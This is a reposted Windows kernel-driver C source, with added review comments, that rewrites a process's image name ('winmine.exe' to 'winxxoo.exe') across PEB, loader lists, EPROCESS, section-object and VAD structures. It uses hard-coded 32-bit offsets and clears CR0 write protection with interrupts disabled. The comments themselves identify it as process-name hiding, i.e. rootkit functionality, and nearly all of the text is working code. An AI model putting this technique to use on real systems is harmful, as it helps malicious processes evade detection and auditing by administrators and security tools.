转载 修改进程名
//Fypher
//http://hi.baidu.com/nmn714
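/* Defined later in this file; declared here so the calls below are checked
 * against the real signatures instead of relying on implicit declarations. */
VOID FindAndChangeUni(ULONG strAddr);
VOID FindAndChangeA(ULONG strAddr, ULONG len);

/*
 * Read the ULONG stored at addr, but only after confirming the page is
 * mapped. Returns 1 and stores the value in *out on success, 0 (with *out
 * untouched) when addr is NULL or MmIsAddressValid rejects it.
 *
 * MmIsAddressValid only proves that touching the address will not fault
 * right now; it says nothing about whether the object behind it has the
 * layout the hard-coded offsets assume.
 */
static int ChangeNameReadPtr(ULONG addr, ULONG *out)
{
    if (addr == 0 || !MmIsAddressValid((void *)addr))
        return 0;
    *out = *(PULONG)addr;
    return 1;
}

/*
 * Patch the file name reachable through the section object:
 *   EPROCESS->SectionObject->Segment->ControlArea->FileObject->FileName
 * Every hop is validated; the chain is abandoned silently at the first
 * unmapped or NULL pointer.
 */
static void ChangeNameViaSection(ULONG pProcess)
{
    ULONG p = 0;

    if (!ChangeNameReadPtr(pProcess + 0x138, &p)) return;   /* SectionObject */
    if (!ChangeNameReadPtr(p + 0x14, &p))        return;   /* Segment */
    if (!ChangeNameReadPtr(p, &p))               return;   /* ControlArea */
    if (!ChangeNameReadPtr(p + 0x024, &p))       return;   /* FileObject */
    if (p == 0 || !MmIsAddressValid((void *)(p + 0x030)))
        return;
    FindAndChangeUni(p + 0x030);                            /* FileName */
}

/*
 * Patch the file name reachable through the VAD tree, following the same
 * pointer chain the original code walked (root -> +0x10 -> +0x018 -> +0x024
 * -> UNICODE_STRING at +0x030), with every hop validated.
 */
static void ChangeNameViaVad(ULONG pProcess)
{
    ULONG p = 0;

    if (!ChangeNameReadPtr(pProcess + 0x11c, &p)) return;   /* VAD root */
    if (!ChangeNameReadPtr(p + 0x10, &p))        return;
    if (!ChangeNameReadPtr(p + 0x018, &p))       return;
    if (!ChangeNameReadPtr(p + 0x024, &p))       return;
    if (p == 0 || !MmIsAddressValid((void *)(p + 0x030)))
        return;
    FindAndChangeUni(p + 0x030);
}

/*
 * ChangeName -- rewrite every copy of a process's image name that this code
 * knows about (user-mode PEB/loader strings and several kernel-side
 * EPROCESS strings) so that "winmine.exe" reads "winxxoo.exe" everywhere.
 * The actual search-and-replace is done by FindAndChangeUni/FindAndChangeA.
 *
 * pProcess: address of the target EPROCESS.
 *
 * Review notes:
 *  - This is process-name hiding, i.e. rootkit functionality. Treat it as
 *    research material for a disposable VM, nothing more.
 *  - Every offset below (EPROCESS 0x1b0/0x174/0x1F4/0x138/0x11c, PEB
 *    0x010/0x00c, ProcessParameters 0x038/0x040/0x070, Ldr 0x00c/0x014,
 *    loader entry 0x024/0x02c) is hard-coded for one 32-bit Windows build.
 *    On any other build these writes land in unrelated memory. Resolve the
 *    offsets from symbols for the running build before relying on this.
 *  - Fix: the kernel-side chains are now guarded with MmIsAddressValid,
 *    which the original only left as a TODO; the SeAuditProcessCreationInfo
 *    pointer is NULL-checked; unused locals were dropped.
 *  - User-mode reads are still protected only by SEH, as in the original.
 */
VOID ChangeName(ULONG pProcess){
    ULONG peb = 0, ProcessParameters, ldr;
    ULONG InLoadOrderModuleList;
    ULONG InMemoryOrderModuleList;
    ULONG auditNameInfo = 0;
    KAPC_STATE kapc;

    /* PEB pointer lives in the EPROCESS; a process with no PEB (e.g. the
     * System process) has nothing user-mode to patch. */
    if (ChangeNameReadPtr(pProcess + 0x1b0, &peb) && peb != 0) {
        /* The PEB is a user-mode address, so we must run in the target's
         * address space to touch it. */
        KeStackAttachProcess((PEPROCESS)pProcess, &kapc);
        __try{
            ProcessParameters = *(PULONG)(peb + 0x010);
            //ImagePathName
            FindAndChangeUni(ProcessParameters+0x038);
            //CommandLine
            FindAndChangeUni(ProcessParameters+0x040);
            //WindowTitle
            FindAndChangeUni(ProcessParameters+0x070);
            //Ldr
            ldr = *(PULONG)(peb + 0x00c);
            //InLoadOrderModuleList->FullDllName
            InLoadOrderModuleList = *(PULONG)(ldr+0x00c);
            FindAndChangeUni(InLoadOrderModuleList+0x024);
            //InLoadOrderModuleList->BaseDllName
            FindAndChangeUni(InLoadOrderModuleList+0x02c);
            /* NOTE(review): the original labels this FullDllName, but the
             * Flink of InMemoryOrderModuleList does not point at the start
             * of the loader entry the way the in-load-order link does, so
             * +0x024 here is unlikely to be the same field as above.
             * Confirm against the target build's layout. Kept as written. */
            InMemoryOrderModuleList = *(PULONG)(ldr+0x014);
            FindAndChangeUni(InMemoryOrderModuleList+0x024);
        }__except(1){   /* 1 == EXCEPTION_EXECUTE_HANDLER */
            KdPrint(("exception occured!"));
        }
        KeUnstackDetachProcess (&kapc);
    }

    //EPROCESS-->ImageFileName (fixed 16-byte ANSI field)
    FindAndChangeA(pProcess+0x174,16);

    //EPROCESS-->SeAuditProcessCreationInfo->ImageFileName
    //The field holds a pointer that can be NULL; FindAndChangeUni expects
    //the address of a UNICODE_STRING.
    if (ChangeNameReadPtr(pProcess + 0x1F4, &auditNameInfo) &&
        auditNameInfo != 0 && MmIsAddressValid((void *)auditNameInfo))
        FindAndChangeUni(auditNameInfo);

    //EPROCESS->SectionObject->Segment->ControlArea->FileObject->FileName
    ChangeNameViaSection(pProcess);

    //VAD
    ChangeNameViaVad(pProcess);
}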
//Fypher
//http://hi.baidu.com/nmn714
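/*
 * FindAndChangeUni -- if the UNICODE_STRING at strAddr contains
 * "winmine.exe" (case-insensitive, anywhere within its Length), overwrite
 * characters 3..6 of the first match with "xxoo" in place, turning
 * "winmine.exe" into "winxxoo.exe". Length and MaximumLength are left
 * alone, so the string keeps its size; nothing is done when there is no
 * match.
 *
 * strAddr: address of a UNICODE_STRING (NOT of the character buffer).
 *          NULL, an empty Buffer, and strings shorter than 11 characters
 *          are ignored.
 *
 * Review notes:
 *  - Fix: uniStr is now NULL-checked before use; callers pass pointers read
 *    straight out of EPROCESS fields that can legitimately be NULL.
 *  - Fix: the replacement characters were written with typographic quotes
 *    (‘x‘), which does not compile; they are now plain wide-char literals.
 *  - The write is done with interrupts disabled and CR0.WP cleared, as in
 *    the original. NOTE(review): the strings patched here are presumably
 *    ordinary writable pages, so clearing WP is unlikely to be needed, and
 *    a fault raised while interrupts are off is not something the __try
 *    can be relied on to absorb cleanly -- confirm on the target build
 *    before keeping this construction.
 */
VOID FindAndChangeUni(ULONG strAddr){
    PUNICODE_STRING uniStr = (PUNICODE_STRING)strAddr;
    PWCHAR str;
    ULONG len, maxLen;
    ULONG i = 0;

    if (!uniStr)
        return;
    len    = uniStr->Length / 2;          /* Length is in bytes, not WCHARs */
    maxLen = uniStr->MaximumLength / 2;
    str    = uniStr->Buffer;
    if (!str || len < 11 || maxLen < 11)
        return;

    /* i <= len - 11 keeps the 11-character compare, and the writes at
     * i+3..i+6 below, inside the first len characters. */
    for (i = 0; i <= len - 11; ++i) {
        if (!_wcsnicmp(str + i, L"winmine.exe", 11))
            break;
    }
    if (i > len - 11)
        return;

    /* Disable interrupts and clear CR0.WP so ring-0 writes ignore
     * read-only page protections. */
    _asm{
        cli
        mov eax, cr0
        and eax, not 0x10000
        mov cr0, eax
    }
    /* str may point into the PEB (user-mode memory), so the write is
     * wrapped in SEH. */
    __try{
        str[i+3] = L'x';
        str[i+4] = L'x';
        str[i+5] = L'o';
        str[i+6] = L'o';
    }__except(1){   /* 1 == EXCEPTION_EXECUTE_HANDLER */
    }
    /* Restore WP and re-enable interrupts. */
    _asm{
        mov eax, cr0
        or eax, 0x10000
        mov cr0, eax
        sti
    }
}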
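/*
 * FindAndChangeA -- ANSI counterpart of FindAndChangeUni. Scans the first
 * len bytes at strAddr for "winmine.exe" (case-insensitive) and overwrites
 * characters 3..6 of the first match with "xxoo" in place, so the name
 * reads "winxxoo.exe". No terminator is required or assumed: only the
 * caller-supplied len bounds the search (ChangeName passes 16 for the
 * fixed-size EPROCESS ImageFileName field).
 *
 * strAddr: address of the byte buffer; NULL is ignored.
 * len:     number of bytes that may be read; values below 11 are ignored.
 *
 * Review notes:
 *  - Fix: the replacement characters were written with typographic quotes
 *    (‘x‘), which does not compile; they are now plain char literals.
 *  - As in FindAndChangeUni, the write runs with interrupts disabled and
 *    CR0.WP cleared. NOTE(review): the target here is an EPROCESS field,
 *    presumably writable pool, so the WP dance is likely unnecessary, and a
 *    fault with interrupts off is not safely absorbed by the __try --
 *    confirm on the target build.
 */
VOID FindAndChangeA(ULONG strAddr,ULONG len){
    PUCHAR str = (PUCHAR)strAddr;
    ULONG i = 0;

    if (!str || len < 11)
        return;

    /* i <= len - 11 keeps the 11-byte compare, and the writes at i+3..i+6
     * below, inside the first len bytes. */
    for (i = 0; i <= len - 11; ++i) {
        if (!_strnicmp(str + i, "winmine.exe", 11))
            break;
    }
    if (i > len - 11)
        return;

    /* Disable interrupts and clear CR0.WP so ring-0 writes ignore
     * read-only page protections. */
    _asm{
        cli
        mov eax, cr0
        and eax, not 0x10000
        mov cr0, eax
    }
    /* Wrapped in SEH in case the target page is not writable/present. */
    __try{
        str[i+3] = 'x';
        str[i+4] = 'x';
        str[i+5] = 'o';
        str[i+6] = 'o';
    }__except(1){   /* 1 == EXCEPTION_EXECUTE_HANDLER */
    }
    /* Restore WP and re-enable interrupts. */
    _asm{
        mov eax, cr0
        or eax, 0x10000
        mov cr0, eax
        sti
    }
}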